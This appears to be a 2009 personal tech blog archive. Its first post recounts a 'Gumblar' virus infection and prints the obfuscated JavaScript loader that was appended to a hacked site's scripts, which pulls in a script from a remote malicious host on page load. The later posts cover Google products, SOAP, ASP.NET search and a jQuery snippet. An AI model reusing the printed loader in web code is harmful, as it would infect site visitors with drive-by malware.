Thursday, December 24, 2009

"Gumblaroid" Virus

Yesterday my computer lab where I host 5+ workstations has been attacked by a virus which is called "Gumblaroid" as I have figured
out today. To make a long story short - I ended up resurrecting drive C from a backup. I recommend that you check your system for stability at least once a week
 and make a full image of drive C every week. Keep a history of at least few months back.


1. You visit some site (I used FireFox) i.e. - click on a link in email or something like this

2. In about 30-50 seconds you get "You <something> was installed" popup (regular Windows GUI), so the infection has already happened

3. Run "netstat /a" in command prompt - you will see 100s if not more out-bound SMTP-port connections

4. Virus links with core Windows processes so if you run "netstat /a /b" you will see things like "svchost.exe" that create this traffic -

this is because virus has attached as a DLL into legit Windows process.

5. Any attempt from any browser to open Google and search for anything results in a return of a blank page (zero-length HTML content) -

virus blocks TCP/IP inbound from Google search result page (same for Yahoo). You can use other search engines like "" while this happens.

Today I have figured out how I got it, I was served a regular page from a PHP-powered site and a piece of turd has attached itself to the tail of all JavaScripts on the WebServer. This turd has been "sanitized" and is presented below.

This is what was served to me from malevolent site:

/*GNU GPL*/ try{window.onload = function(){var Kjnilav1ca = document.createElement('s@@!@c@!r&)(i##p)&@t)'.replace(/\)|\!|&|\^|\$|@|\(|#/ig, ''));Kjnilav1ca.setAttribute('type', 'text/javascript');Kjnilav1ca.setAttribute('src',  'h(t$(!)t!p#@#(:@$/^&$$^/^&w)e))@l&#^)t#!!)-$d##&e#.@k)a#)i^x(@(@i(()^n!#^.&&c@o$m!.^)g$&)$a)!&#m!((e)(#z!$t&(&$a&&r@&#-$#c)$@o$m@$.^!w$@o@r&!l&@&d)&#m$(u^#s!@!i!&$@c)m^^(a@&g)^&a#&z^!(i!n#)^^e)&.@!^r^u$^:&$8!0()8#!0)!/#$@s)($o)!u(&t$!$)h!@^w()e@s!t!.@@&c)@!^)o&#m&&&$@/!)&s)^o@!!(u)!t^h@$w!)#!e!s&t(#.!@))!c$^o@)m)@@/&&g&#o(o)(^g)&l($)#)e@&^^^.@#c@$(o$^m@#!#/&d@!$i()#s(c@$^u&)s$^!)s^#@)).(!c#$^o#&!m(^$(.$h#^k#/)^1@$&($6!#3$.@!c@#^o)(m$&/('.replace(/\!|\^|&|@|\)|#|\(|\$/ig, ''));Kjnilav1ca.setAttribute('defer', 'defer');Kjnilav1ca.setAttribute('id', 'Z$@7&^q)a$(!5!&9#(w&)#7$e@l^^'.replace(/\)|#|\!|\^|&|@|\(|\$/ig, ''));document.body.appendChild(Kjnilav1ca);}} catch(e) {}

Obviously, different sites have different mutations of the same thing as it uses Regexes to crap-up itself.
Please check this link by Daniel Ansari for info how to remove this infection:

Tuesday, December 22, 2009

Microsoft Documents alla Google Docs

Today I'v heard that Google bought DocVerse for $25M

It is a plugin that integrates right into MS Office and makes local Office programs behave like Google Docs....Microsoft is left behind again...

See this:

Saturday, December 19, 2009

GOOGLE phone and GOOGLE Laptop

Looks like the rumors about Google's own phone are materializing see the link below:

Also, rumor has it that Google will release it's own net book with Chrome OS.

Google gotta make sure that people CAN save files locally though, - it is not going to be possible to convince everyone to keep it all in the cloud.

Friday, December 18, 2009

Why don't Web Services/SOAP support passing of my own C# type?

This was asked today at work.........
Look at the question again....rings the bell? ..then look again...
How can SOAP be so cruel? It was never meant to pass your custom memory structures
as-is, because those structures are specific to your code/library/environment/platform...
How do you expect Linux binary file, originally created in C++ where all
memory structures are allocated differently or even on a different processor, de-serialize
your.NET class? .NET class has both data fields and methods (somewhere in a code segment) scoped to your class - you MUST have your assembly on the other end. Don't ask me how Microsoft builds a Web Service proxy on the consumer end - that's the point - it's a "proxy"
it is merely an "adapter" between you and remote server, effectively you are making an RPC call
and just for your convenience does Microsoft call proxy class the same name as your web service on the other end. Web services are all about cross-platform-ability, not about your .NET stuff!

Search on your ASP.NET Website

Many people just don't realize that some most trivial things in IT-life are not that "out-of-the-box-y" at all.
One of them is "Search". Many sites have a Search function, so it is easy to do, right?

I have summarized the approaches to "Search" here:
a. Do your own site search - host it on your server
b. Integrate external search (like Google)

In case of [a] from above: MS indexing service is really a piece of turd when it comes to web indexing, pardon my French, reason being - it does not turn your ASPX files
into static content, it was never built for that so you end-up with an index of your C# code or any other server-side markup.
I know a few people who have "materialized" ASPX and other ASP resources into "/static" folder ,then unleashed MS Indexing on it, then when MS indexing gives you result
, remap "static.html" back into "dynamic.aspx" , and this does suck, but it does work as well!
Another approach in [a] case from above - Google for "ASP.NET indexing" and go buy a dedicated ASP.NET solution of your problem, this sux a ton :(

Now, when you want to utilize Sergey and Larry in [b] case from above, there are quite a few cool features:
if you don't care about how your search result looks - just create a plain HTML form post back to Google with site search parameter preset to your domain.

If you are fastidious as to how search results are "branded" - Google for "Google Search API" and indeed you can customize it, but, what not that many people know, there is a
REST service that returns plain JSON, even with a callback! So, if you are a fan of JQuery, here is a code for you:

$.ajax({  type: "GET", url: "",
data: {q: $("#YOURTEXTBOXID").val(),
callback: "resultReady",
context: "doSearch",
rsz: "large"}, dataType: "script"
and finally:
     function resultReady(ctx, data)
for (var i in data.results)
data.results[i] your stuff dynamically

Google for "Custom Search Engine" to get "YOURCUSTOMSITEID", basically this will allow you to set-up a profile that will
filter searches to URLs that you specify - just what we have needed for a long time!

That's IT!

Remember to check GOOGLE Terms and comply with their logo and other requirements.

Thursday, December 17, 2009

Supressing Default Form Submit on [ENTER]

Problem is - when you hit <ENTER> form gets submitted,
 but in most cases you need to run, let's say, AJAX and just "automate" text box so it initiates AJAX w/o form submit.
This is very easy to do with jQuery that shields you from tedious cross-browser nuances:

$("#tbDoSearchText").keydown(function(e) { if (e.keyCode==13) {$("#btnDoSearch").click(); e.stopPropagation(); return false; }});

   tbDoSearchText - is your text box with user search terms text,  btnDoSearch - the button that runs AJAX search "onclick"

I have bolded important part.

Thats it -  when user enters search text and hits <ENTER> - "onClick" is called and AJAX starts (assuming you have an AJAX call in button click event)